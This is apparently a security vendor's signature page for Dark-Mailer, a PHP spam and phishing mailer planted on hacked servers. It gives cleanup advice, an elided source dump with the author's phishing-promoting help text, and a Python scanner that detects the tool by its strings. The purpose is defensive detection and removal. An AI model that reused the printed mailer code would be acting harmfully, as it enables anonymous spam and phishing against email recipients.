Malware Signatures

php.hacktool.dark-mailer.001

Dark-Mailer is a sophisticated mail editor and sender. It allows sending emails from hacked servers without leaving the sender's real IP address in the email headers, which makes it a tool for sending anonymous emails, phishing and spam.
Unlike many other simple mail scripts, Dark Mailer provides rich editing functionality (formatting, BBCodes, file attachments, automatic substitutions). Emails can be sent to a single address or to a list of addresses. It can also be given web pages, and the script will grab email addresses from those pages.

Affecting

Any server with PHP enabled.

Cleanup

Delete the mailer script and scan your server for other types of malware, specifically for backdoors. Make sure to identify and close the security hole.
You also need to check whether your server's IP address has been blacklisted by anti-spam blacklist providers as a result of the hacker's activity.
You can also sign up with us and let our team remove the malware for you.

Dump


<title>Dark-Mailer V.2.2 by p0LYM0rPH2012 / ZyphoMud </title>
...
document.getElementById('About').style.display='block';
document.getElementById('greetz').innerHTML = 'Simply fill out the form and press the "Send"-Button.<br>You can attach a file, which will be uploaded to the server, encoded for the Email and then be deleted from the server(If PHP Safe-Mode is not active).<br><br>If you wish, you can spam around by inserting a lot of Email-Adresses and let the script pass through this list about 1000 times ;). Depence on PHP execution time if Safe-Mode's on!!!!<br><br>If you type "{email}" in the "Subject" or "Message" field the script will exchange it with the Email-Adresse you typed in the "Your Email" field<br><br>You can set the Email to a plain text Email or a HTML-Email(with or without parsing BBCodes)...good for Phishers ;)<br><br>Supported BBCode-Tags: b,i,u,center,img,url,red,blue,yellow,color,size,quote,quote=<br><br>Now you can try out the new E-Mail Grabber. Type an URL and the Grabber will search for E-Mails on the site. The Grabber is Alpha !!!<br><br><br>GreetingZ go out to all DarkenedCore Members. Dedicated to my sweet darling Enigma23-FC ';
...
b_help = "Fat Text: [b]Text[/b] (alt+b)";
i_help = "Cursive Text: [i]Text[/i] (alt+i)";
u_help = "Underlined Text: [u]Text[/u] (alt+u)";
q_help = "Quote: [quote]Text[/quote] (alt+q)";
p_help = "Insert an image: [img]http://Image-URL[/img] (alt+p)";
w_help = "Insert an URL: [url]http://URL[/url] (alt+w)";
s_help = "Font-color: [color=red]Text[/color]";
f_help = "Font-Size: [size=x-small]Small text[/size]";
bbcode = new Array();
bbtags = new Array('[b]','[/b]','[i]','[/i]','[u]','[/u]','[quote]','[/quote]','[code]','[/code]','[list]','[/list]','[list=]','[/list]','[img]','[/img]','[url]','[/url]');
...
if($_FILES["file"]["tmp_name"] != "" && $_FILES["file"] != " ")
{
$UPLOAD = 1;
$Filename = $_FILES["file"]["tmp_name"];
$FilenameMail = $_POST['fakefilename'];
$FileType= $_FILES["file"]["type"];
@chmod("./",777);
move_uploaded_file($Filename, "./$FilenameMail") or die("The file you are trying to upload couldn't be copied to the server. Maybe no R/W Access?");
$content = fread(fopen($FilenameMail,"r"),filesize($FilenameMail));
$content = chunk_split(base64_encode($content));

}
...
$uid = strtoupper(md5(uniqid(time())));
$header = "From: $sendername <$from>rnReply-To: $Replyrn";
$header .= "MIME-Version: 1.0rn";
If ($UPLOAD) $header .= "Content-Type: multipart/mixed; boundary=$uidrn";
If ($UPLOAD) $header .= "--$uidrn";
$header .= "Content-Type: text/$contenttypern";
$header .= "Content-Transfer-Encoding: 8bitrnrn";
$header .= "$Messagern";
If ($UPLOAD) $header .= "--$uidrn";
If ($UPLOAD) $header .= "Content-Type: $FileType; name="$FilenameMail"rn";
If ($UPLOAD) $header .= "Content-Transfer-Encoding: base64rn";
If ($UPLOAD) $header .= "Content-Disposition: attachment; filename="$FilenameMail"rnrn";
If ($UPLOAD) $header .= "$contentrn";
If ($UPLOAD) $header .= "--$uid--";
@unlink ($FilenameMail);
...
</td></tr></table></center>
<center><font color="white" size="-2">Dark-Mailer V.2.2 powered by p0LYM0rPH2012 aka Nemesis23-FC </font></center>
</body>
</html>
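
The scan step from the cleanup advice, sketched as an added example (not part of the original signature or of the vendor's detection logic): a file scanner that looks for strings visible in the dump above. The regexes, the two-indicator threshold, the suffix list and the sample inputs are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Strings copied from the dump on this page; the regexes around them are this example's own.
INDICATORS = [
    ("banner", re.compile(rb"Dark-Mailer V\.\d", re.I)),
    ("author_tag", re.compile(rb"p0LYM0rPH2012", re.I)),
    ("fakefilename_param", re.compile(rb"\$_POST\[['\"]fakefilename['\"]\]")),
    ("chmod_cwd_777", re.compile(rb"chmod\(\s*[\"']\./[\"']\s*,\s*0?777\s*\)")),
    ("grabber_help", re.compile(rb"E-Mail Grabber", re.I)),
]
MIN_HITS = 2  # assumption: a single string may just be a page quoting the tool's name
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}  # assumption: match your PHP handler map

# Constructed samples: two lines taken from the dump, and an ordinary contact form.
SAMPLE_HIT = (b"<title>Dark-Mailer V.2.2 by p0LYM0rPH2012 / ZyphoMud </title>\n"
              b"$FilenameMail = $_POST['fakefilename'];\n")
SAMPLE_CLEAN = b"<?php mail($to, 'Contact form', $body); ?>\n"


def match_indicators(data: bytes) -> list:
    """Names of the indicators present in data, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(data)]


def is_suspect(data: bytes) -> bool:
    """True when at least MIN_HITS distinct indicators are present."""
    return len(match_indicators(data)) >= MIN_HITS


def scan_tree(root, max_bytes=2_000_000) -> dict:
    """Return {path: indicator names} for suspect PHP-executable files under root."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        try:
            with path.open("rb") as fh:
                data = fh.read(max_bytes)  # cap the read so huge files do not stall the scan
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        hits = match_indicators(data)
        if len(hits) >= MIN_HITS:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for found, names in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{found}: {', '.join(names)}")
```

A hit only locates this one mailer; the backdoor or upload hole that placed it still has to be found separately, as the cleanup text says.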